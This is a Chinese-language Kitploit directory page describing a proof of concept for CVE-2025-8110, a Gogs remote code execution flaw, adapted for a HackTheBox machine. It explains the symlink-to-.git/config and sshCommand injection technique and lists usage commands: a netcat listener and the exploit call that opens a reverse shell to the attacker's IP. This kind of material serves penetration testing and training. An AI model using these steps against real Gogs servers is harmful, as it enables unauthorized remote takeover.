Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8110 — Gogs 服务漏洞利用并获取 root 用户 | Kitploit
工具/GitHubGitHub/ixzodiak/cve-2025-8110
漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育红队远程访问工具
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Gogs 服务漏洞利用并获取 root 用户

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8110 — Gogs RCE PoC(Silentium / HackTheBox)

免责声明: 本工具仅供教育目的和授权渗透测试使用。请仅针对您拥有明确测试权限的系统使用。


这是 zAbuQasem/gogs-CVE-2025-8110 的修改版本,已适配 HackTheBox 上的 Silentium 机器。原始 PoC 需要调整以应对 Silentium 特定的 Gogs 配置和认证流程。


漏洞概述

CVE-2025-8110 是 Gogs(一个自托管的 Git 服务)中的一个远程代码执行漏洞。

Gogs 的文件更新 API 端点(PUT /api/v1/repos/.../contents/<file>)不会验证目标文件是否为符号链接。经过身份验证的攻击者可以将指向 .git/config 的符号链接推送到仓库中,然后利用该 API 用恶意载荷覆盖它。该载荷会将自定义的 sshCommand 注入到 git 配置中,Gogs 在下次对该仓库执行 SSH 操作时会在服务端执行该命令,从而实现远程代码执行。


PoC 的功能

  1. 向 Gogs 进行身份验证,并从登录页面抓取 CSRF 令牌。
  2. 通过用户设置页面生成 Gogs API 令牌。
  3. 通过 API 创建一个启用 SSH 的新仓库。
  4. 在本地克隆仓库,植入符号链接(malicious_link -> .git/config)并推送。
  5. 对符号链接调用文件更新 API,写入包含 sshCommand = <reverse shell> 的恶意 .git/config。
  6. Gogs 跟随符号链接并覆盖其自身的 .git/config,在下次执行 SSH 操作时触发 Shell。

使用方法

安装依赖:

root@kitploit:~
pip install -r requirements.txt

启动监听器:

root@kitploit:~
nc -lvnp <PORT>

运行漏洞利用程序:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

可选 — 通过 Burp Suite 路由流量:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
下载工具
参数描述
-uGogs 基础 URL
-lh您的攻击机 IP(反向 Shell 主机)
-lp您的监听端口
-un您注册的 Gogs 用户名
-pw您的 Gogs 密码
-x(可选)通过 localhost:8080 上的 Burp 路由流量